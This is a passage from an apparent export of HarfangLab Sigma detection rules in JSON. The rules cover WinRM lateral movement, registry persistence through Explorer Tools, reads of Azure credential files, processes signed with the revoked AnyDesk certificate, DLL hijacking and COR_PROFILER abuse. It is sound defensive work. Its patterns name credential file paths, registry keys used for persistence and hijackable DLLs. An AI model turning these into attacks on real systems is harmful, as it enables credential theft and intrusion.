further actions.\nIt is recommended to investigate the IIS processes near and after the load for suspicious behavior.\n", "rule_creation_date": "2025-07-25", "rule_modified_date": "2025-10-16", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1620" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "32191273-d165-4ec0-87ae-c0ebbdbda1af", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.620831Z", "creation_date": "2026-03-23T11:45:34.620832Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.620837Z", "rule_level": "medium", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", "https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/winrmsecurity?view=powershell-7.2", "https://attack.mitre.org/techniques/T1021/006/" ], "name": "t1021_006_winrm_service_auto.yml", "content": "title: WinRM Service auto-start Enabled\nid: 32191273-d165-4ec0-87ae-c0ebbdbda1af\ndescription: |\n Detects when the Windows Remote Management (WinRM) service is set to auto-start.\n Windows Remote Management is a common Windows service that is used to interact with a remote system and is used, in particular, by PowerShell Remoting.\n This can be used by an attacker to move laterally within an organization.\n It is recommended to analyze the process responsible for the registry modification as well as to look for subsequent, unwanted usage of WinRM.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management\n - https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/winrmsecurity?view=powershell-7.2\n - https://attack.mitre.org/techniques/T1021/006/\ndate: 2022/11/04\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.006\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WinRM\\Start'\n Details: 'DWORD (0x00000002)' # SERVICE_AUTO_START\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_loadstate:\n ProcessOriginalFileName: 'LoadState.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_exchange:\n ProcessOriginalFileName: 'ExSetupUI.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "32191273-d165-4ec0-87ae-c0ebbdbda1af", "rule_name": "WinRM Service auto-start Enabled", "rule_description": "Detects when the Windows Remote Management (WinRM) service is set to auto-start.\nWindows Remote Management is a common Windows service that is used to interact with a remote system and is used, in particular, by PowerShell Remoting.\nThis can be used by an attacker to move laterally within an organization.\nIt is recommended to analyze the process responsible for the registry modification as well as to look for subsequent, unwanted usage of WinRM.\n", "rule_creation_date": "2022-11-04", "rule_modified_date": "2026-03-16", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.lateral_movement" ], "rule_technique_tags": [ "attack.t1021.006" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "323dc7e5-08a1-429c-83b5-3df588b5a245", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.082314Z", "creation_date": "2026-03-23T11:45:34.082316Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.082320Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://persistence-info.github.io/Data/explorertools.html", "https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/", "https://attack.mitre.org/techniques/T1546/" ], "name": "t1546_persistence_explorer_tools.yml", "content": "title: Possible Explorer Tools Persistence Added\nid: 323dc7e5-08a1-429c-83b5-3df588b5a245\ndescription: |\n Detects the edition of the Explorer Tools registry keys that lists tools sometimes called by Windows.\n This method is used as a means to achieve persistence by replacing one of the registry keys by a malicious payload.\n It is recommended to analyze the process responsible for this registry modification to look for other malicious actions, as well as to analyze the file pointed to by the registry value.\nreferences:\n - https://persistence-info.github.io/Data/explorertools.html\n - https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\BackupPath\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\cleanuppath\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\defragpath\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\NameSpace\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\RemovableStorage\\(Default)'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_legitimate_tools:\n Details|contains:\n - '%SystemRoot%\\system32\\sdclt.exe'\n - '%SystemRoot%\\System32\\cleanmgr.exe'\n - '%systemroot%\\system32\\dfrgui.exe'\n - '%systemroot%\\system32\\wbadmin.msc'\n\n exclusion_iobit:\n ProcessImage:\n - '?:\\Program Files\\iobit\\advanced systemcare\\ascinit.exe'\n - '?:\\Program Files (x86)\\iobit\\advanced systemcare\\ascinit.exe'\n Details:\n - '?:\\Program Files\\iobit\\advanced systemcare\\diskdefrag.exe'\n - '?:\\Program Files (x86)\\iobit\\advanced systemcare\\diskdefrag.exe'\n\n exclusion_defraggler:\n Details:\n - '?:\\program files\\defraggler\\defraggler64.exe'\n - '?:\\program files (x86)\\defraggler\\defraggler64.exe'\n - '?:\\program files\\utilitaires disque\\defraggler\\defraggler64.exe'\n - '?:\\program files (x86)\\utilitaires disque\\defraggler\\defraggler64.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "323dc7e5-08a1-429c-83b5-3df588b5a245", "rule_name": "Possible Explorer Tools Persistence Added", "rule_description": "Detects the edition of the Explorer Tools registry keys that lists tools sometimes called by Windows.\nThis method is used as a means to achieve persistence by replacing one of the registry keys by a malicious payload.\nIt is recommended to analyze the process responsible for this registry modification to look for other malicious actions, as well as to analyze the file pointed to by the registry value.\n", "rule_creation_date": "2022-07-20", "rule_modified_date": "2025-01-28", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.persistence" ], "rule_technique_tags": [ "attack.t1546" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "3309bac8-843b-4a14-91b2-c7af144c1be8", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.625588Z", "creation_date": "2026-03-23T11:45:34.625590Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.625594Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1552/001/" ], "name": "t1552_004_azure_config_read_macos.yml", "content": "title: Suspicious Access to Azure Configuration File\nid: 3309bac8-843b-4a14-91b2-c7af144c1be8\ndescription: |\n Detects an attempt to read the contents of the Azure configuration file.\n Adversaries may attempt to read an Azure user's configuration file in order to gather credentials and move to cloud environments.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1552/001/\ndate: 2024/06/18\nmodified: 2025/12/22\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Kind: 'read'\n Path:\n - '/Users/*/.azure/azureProfile.json'\n - '/Users/*/.azure/accessTokens.json'\n ProcessImage|contains: '?'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_md5:\n Image: '/sbin/md5'\n\n exclusion_az_python:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'org.python.python'\n ProcessParentCommandLine|contains: '/opt/homebrew/bin/az '\n\n exclusion_jq:\n ProcessCommandLine: 'jq -r [.subscriptions[]|select(.isDefault==true)|.name][]|strings /Users/*/.azure/azureProfile.json'\n\n exclusion_claude:\n Image: '/opt/homebrew/Caskroom/claude-code/*/claude'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "3309bac8-843b-4a14-91b2-c7af144c1be8", "rule_name": "Suspicious Access to Azure Configuration File", "rule_description": "Detects an attempt to read the contents of the Azure configuration file.\nAdversaries may attempt to read an Azure user's configuration file in order to gather credentials and move to cloud environments.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n", "rule_creation_date": "2024-06-18", "rule_modified_date": "2025-12-22", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access" ], "rule_technique_tags": [ "attack.t1552.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "331fa9c5-fe30-471e-ba82-51940fe0a2d3", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.071261Z", "creation_date": "2026-03-23T11:45:34.071263Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.071267Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/", "https://attack.mitre.org/techniques/T1553/002/" ], "name": "t1553_002_anydesk_revoked_certificate.yml", "content": "title: Process Executed Signed with AnyDesk Revoked Certificate\nid: 331fa9c5-fe30-471e-ba82-51940fe0a2d3\ndescription: |\n Detects the execution of a process signed using the AnyDesk revoked certificate.\n This certificate has been revoked after AnyDesk has confirmed that its production systems had been compromised following a cyber-attack in early 2024.\n It is recommended to investigate the process to determine its legitimacy.\nreferences:\n - https://cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2024/02/20\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessSignatureSignerThumbprint: '9cd1ddb78ed05282353b20cdfe8fa0a4fb6c1ece'\n\n filter_anydesk:\n OriginalFileName: ''\n Description: 'AnyDesk'\n Company: 'AnyDesk Software GmbH'\n\n condition: selection and not 1 of filter_*\nlevel: critical\n#level: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "331fa9c5-fe30-471e-ba82-51940fe0a2d3", "rule_name": "Process Executed Signed with AnyDesk Revoked Certificate", "rule_description": "Detects the execution of a process signed using the AnyDesk revoked certificate.\nThis certificate has been revoked after AnyDesk has confirmed that its production systems had been compromised following a cyber-attack in early 2024.\nIt is recommended to investigate the process to determine its legitimacy.\n", "rule_creation_date": "2024-02-20", "rule_modified_date": "2025-01-30", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1553.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "336d6115-e9ff-4197-b4b0-9fb7e4469941", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.097696Z", "creation_date": "2026-03-23T11:45:34.097698Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.097702Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_vds.yml", "content": "title: DLL Hijacking via vds.exe\nid: 336d6115-e9ff-4197-b4b0-9fb7e4469941\ndescription: |\n Detects potential Windows DLL Hijacking via vds.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vds.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\bcd.dll'\n - '\\OSUNINST.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "336d6115-e9ff-4197-b4b0-9fb7e4469941", "rule_name": "DLL Hijacking via vds.exe", "rule_description": "Detects potential Windows DLL Hijacking via vds.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "337d171f-6a34-4f7a-8369-d2c7d895322e", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.619359Z", "creation_date": "2026-03-23T11:45:34.619361Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.619365Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://offsec.almond.consulting/UAC-bypass-dotnet.html", "https://redcanary.com/blog/cor_profiler-for-persistence/", "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler", "https://attack.mitre.org/techniques/T1574/012/" ], "name": "t1574_012_clr_profiler_process_environement_variable_powershell.yml", "content": "title: .NET CLR Profiler Environment Variable Set via PowerShell\nid: 337d171f-6a34-4f7a-8369-d2c7d895322e\ndescription: |\n Detects a PowerShell script block setting the COR_PROFILER or COR_PROFILER_PATH environment variables, which can be used maliciously for privilege escalation.\n COR_PROFILER and COR_PROFILER_PATH are environment variables associated with the .NET runtime profiling tools, used for legitimate debugging and optimization purposes.\n However, attackers may exploit these variables to inject malicious payloads, leading to unintended system access levels.\n It is recommended to investigate the PowerShell script responsible for this action.\nreferences:\n - https://offsec.almond.consulting/UAC-bypass-dotnet.html\n - https://redcanary.com/blog/cor_profiler-for-persistence/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler\n - https://attack.mitre.org/techniques/T1574/012/\ndate: 2022/12/23\nmodified: 2025/02/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574.012\n - attack.t1112\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains: '$env:COR_PROFILER'\n\n condition: selection\nlevel: medium\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "337d171f-6a34-4f7a-8369-d2c7d895322e", "rule_name": ".NET CLR Profiler Environment Variable Set via PowerShell", "rule_description": "Detects a PowerShell script block setting the COR_PROFILER or COR_PROFILER_PATH environment variables, which can be used maliciously for privilege escalation.\nCOR_PROFILER and COR_PROFILER_PATH are environment variables associated with the .NET runtime profiling tools, used for legitimate debugging and optimization purposes.\nHowever, attackers may exploit these variables to inject malicious payloads, leading to unintended system access levels.\nIt is recommended to investigate the PowerShell script responsible for this action.\n", "rule_creation_date": "2022-12-23", "rule_modified_date": "2025-02-10", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1112", "attack.t1574.012" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "33c950a0-ccc5-4ddb-a153-b5550bf0d290", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.097496Z", "creation_date": "2026-03-23T11:45:34.097498Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.097502Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_msidb.yml", "content": "title: DLL Hijacking via MsiDb.exe\nid: 33c950a0-ccc5-4ddb-a153-b5550bf0d290\ndescription: |\n Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiDb.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsiDb.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - 